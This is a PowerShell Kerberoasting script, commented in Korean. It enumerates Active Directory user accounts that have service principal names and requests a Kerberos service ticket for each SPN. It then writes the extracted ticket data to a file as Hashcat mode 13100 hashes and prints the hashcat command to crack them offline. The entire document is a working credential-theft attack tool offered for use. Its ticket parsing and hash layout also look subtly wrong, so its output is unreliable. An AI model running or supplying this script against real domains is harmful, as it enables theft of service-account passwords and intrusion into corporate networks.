# 1. .NET 보안 및 ID 모듈 로드
Add-Type -AssemblyName System.IdentityModel

Write-Host "=====================================================================" -ForegroundColor Cyan
Write-Host " [검증 완료] 누락 및 오류 없는 SPN 전수조사 Kerberoasting 시작" -ForegroundColor Cyan
Write-Host "=====================================================================" -ForegroundColor Cyan

# 2. AD에서 컴퓨터를 제외한 '사용자 계정' 중 SPN이 등록된 모든 타겟 검색
$Searcher = [adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$Targets = $Searcher.FindAll()

if ($Targets.Count -eq 0) {
    Write-Host "[-] 도메인 내에 Kerberoasting 가능한 사용자 SPN 계정이 없습니다." -ForegroundColor Red
    return
}

$CurrentDomain = $env:USERDOMAIN
$HashList = [System.Collections.Generic.List[string]]::new()
$TotalSpnCount = 0

# 3. 발견된 사용자 계정 루프
foreach ($Target in $Targets) {
    $SamAccountName = $Target.Properties.samaccountname[0]
    
    # krbtgt는 시스템 난수 계정이므로 실전 크래킹 대상에서 예외 처리
    if ($SamAccountName -eq "krbtgt") { continue }
    
    # [핵심 수정]: 해당 계정에 등록된 [모든 SPN 배열]을 통째로 가져옴
    $AllSPNs = $Target.Properties.serviceprincipalname
    
    Write-Host "`n[*] 계정 발견: $SamAccountName (등록된 SPN 개수: $($AllSPNs.Count)개)" -ForegroundColor Cyan
    
    # ---------------------------------------------------------------------
    # [다중 SPN 전수조사 루프 추가]
    # 한 계정이 여러 개의 SPN을 가지고 있어도 누락 없이 하나씩 전부 추출합니다.
    # ---------------------------------------------------------------------
    foreach ($SPN in $AllSPNs) {
        Write-Host "  -> SPN 추출 중: $SPN" -ForegroundColor Yellow
        $TotalSpnCount++
        
        try {
            # 각 SPN별 고유 Kerberos TGS 토큰 요청
            $Request = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPN
            $RawBytes = $Request.GetRequest()
            
            # 바이너리 내부에서 실제 암호화 데이터 블록(A3 마커) 위치 탐색
            $StartOffset = 0
            for ($i = 0; $i -lt $RawBytes.Length - 1; $i++) {
                if ($RawBytes[$i] -eq 163) { # 16진수 A3 = 십진수 163
                    $StartOffset = $i
                    break
                }
            }
            
            if ($StartOffset -eq 0) { $StartOffset = 40 }
            $TargetLength = $RawBytes.Length - $StartOffset
            
            # 버퍼 크기만큼 원본 데이터 무결성 복사 (임의 자르기 없음)
            $CipherBytes = New-Object byte[] $TargetLength
            [Buffer]::BlockCopy($RawBytes, $StartOffset, $CipherBytes, 0, $TargetLength)
            
            # 16진수 문자열로 변환 (공백/대시 제거)
            $CipherTextHex = [System.BitConverter]::ToString($CipherBytes) -replace "-"
            $Etype = "23" # RC4-HMAC
            
            # Hashcat 모드 13100 정품 포맷 문자열 조립
            $HashcatFormat = '$krb5tgs$' + $Etype + '*' + $SamAccountName + '*' + $CurrentDomain + '*' + $SPN + '*' + $CipherTextHex
            
            $HashList.Add($HashcatFormat)
            Write-Host "     [+] 해시 추출 성공!" -ForegroundColor Green
        } 
        catch {
            Write-Host "     [-] $SamAccountName ($SPN) 티켓 요청 및 파싱 실패" -ForegroundColor Red
        }
    }
}

# 4. 파일 저장 처리 (BOM 제거 및 무결성 유지)
if ($HashList.Count -gt 0) {
    if ($MyInvocation.MyCommand.Path) {
        $OutputPath = Join-Path (Split-Path $MyInvocation.MyCommand.Path) "hashcat_hashes.txt"
    } else {
        $OutputPath = ".\hashcat_hashes.txt"
    }
    
    # PowerShell 내장 출력을 쓰지 않고, .NET 인코딩 객체로 BOM이 없는 순수 UTF-8 파일 생성
    $Utf8NoBom = New-Object System.Text.UTF8Encoding($false)
    [System.IO.File]::WriteAllLines($OutputPath, $HashList, $Utf8NoBom)
    
    Write-Host "`n=====================================================================" -ForegroundColor Green
    Write-Host "[+] 전수조사 완료! 총 $($HashList.Count)개의 유효한 해시가 추출되었습니다. (총 시도 SPN: $TotalSpnCount 개)" -ForegroundColor Green
    Write-Host "[+] 저장 경로: $OutputPath" -ForegroundColor Green
    Write-Host "[+] 실행 명령어: hashcat -m 13100 hashcat_hashes.txt <사전파일>" -ForegroundColor Green
    Write-Host "=====================================================================" -ForegroundColor Green
} else {
    Write-Host "`n[-] 유효하게 추출된 해시 결과가 없습니다." -ForegroundColor Red
}
